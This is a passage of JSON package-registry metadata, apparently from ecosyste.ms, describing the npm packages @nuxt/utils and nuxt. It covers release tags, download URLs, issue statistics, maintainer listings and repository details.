1eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-30T17:29:39.841Z","dependent_packages_count":50,"downloads":659382,"downloads_period":"last-month","dependent_repos_count":55931,"rankings":{"downloads":0.24084677185463782,"dependent_repos_count":0.12805930743172717,"dependent_packages_count":0.5959710718903767,"stargazers_count":0.15564167441745766,"forks_count":0.5232519525968256,"docker_downloads_count":0.4437801426250028,"average":0.34792515346933794},"purl":"pkg:npm/%40nuxt/utils","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/utils","docker_dependents_count":260,"docker_downloads_count":1377281,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/utils","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/utils/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-30T17:28:04.615Z","issues_count":5871,"pull_requests_count":3407,"avg_time_to_close_issue":9332335.444497494,"avg_time_to_close_pull_request":861541.6082004556,"issues_closed_count":4168,"pull_requests_closed_count":3071,"pull_request_authors_count":452,"issue_authors_count":2658,"avg_comments_per_issue":5.083461079884176,"avg_comments_per_pull_request":2.0997945406515997,"merged_pull_requests_count":2751,"bot_issues_count":1,"bot_pull_requests_count":1260,"past_year_issues_count":2708,"past_year_pull_requests_count":2299,"past_year_avg_time_to_close_issue":1474414.6537234043,"past_year_avg_time_to_close_pull_request":276897.72019002377,"past_year_issues_closed_count":1870,"past_year_pull_requests_closed_count":2103,"past_year_pull_request_authors_count":309,"past_year_issue_authors_count":1434,"past_year_avg_comments_per_issue":3.439069423929099,"past_year_avg_comments_per_pull_request":2.0508916920400173,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":950,"past_year_merged_pull_requests_count":1916,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":475,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Futils/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Futils/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Futils/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Futils/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Futils/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Futils/codemeta","maintainers":[{"uuid":"pi0","login":"pi0","name":null,"email":"pyapar@gmail.com","url":null,"packages_count":689,"html_url":"https://www.npmjs.com/~pi0","role":null,"created_at":"2022-11-20T01:59:07.380Z","updated_at":"2022-11-20T01:59:07.380Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/pi0/packages"},{"uuid":"antfu","login":"antfu","name":null,"email":"anthonyfu117@hotmail.com","url":null,"packages_count":733,"html_url":"https://www.npmjs.com/~antfu","role":null,"created_at":"2022-11-20T01:59:07.107Z","updated_at":"2022-11-20T01:59:07.107Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/antfu/packages"},{"uuid":"atinux","login":"atinux","name":null,"email":"atinux@gmail.com","url":null,"packages_count":378,"html_url":"https://www.npmjs.com/~atinux","role":null,"created_at":"2022-11-20T01:59:07.223Z","updated_at":"2022-11-20T01:59:07.223Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/atinux/packages"},{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2022-11-20T01:59:07.462Z","updated_at":"2022-11-20T01:59:07.462Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-08-19T18:25:37.887Z","updated_at":"2023-08-19T18:25:37.887Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1248799,"name":"nuxt","ecosystem":"npm","description":"Nuxt is a free and open-source framework with an intuitive and extendable way to create type-safe, performant and production-grade full-stack web applications and websites with Vue.js.","homepage":"https://nuxt.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":null,"versions_count":395,"first_release_published_at":"2016-10-26T11:41:36.169Z","latest_release_published_at":"2026-05-10T23:50:51.441Z","latest_release_number":"4.4.5","last_synced_at":"2026-05-12T02:11:54.046Z","created_at":"2022-04-08T14:52:25.977Z","updated_at":"2026-05-12T02:11:54.046Z","registry_url":"https://www.npmjs.com/package/nuxt","install_command":"npm install nuxt","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"1x":"1.4.5","2x":"2.18.1","alpha":"4.0.0-alpha.4","rc":"4.0.0-rc.0","latest":"4.4.5","3x":"3.21.5"}},"repo_metadata":{"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2023-12-19T00:39:48.000Z","size":110320,"stargazers_count":49067,"open_issues_count":998,"forks_count":4604,"subscribers_count":782,"default_branch":"main","last_synced_at":"2023-12-19T08:47:20.125Z","etag":null,"topics":["csr","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-03-18T22:20:10.502Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":null,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/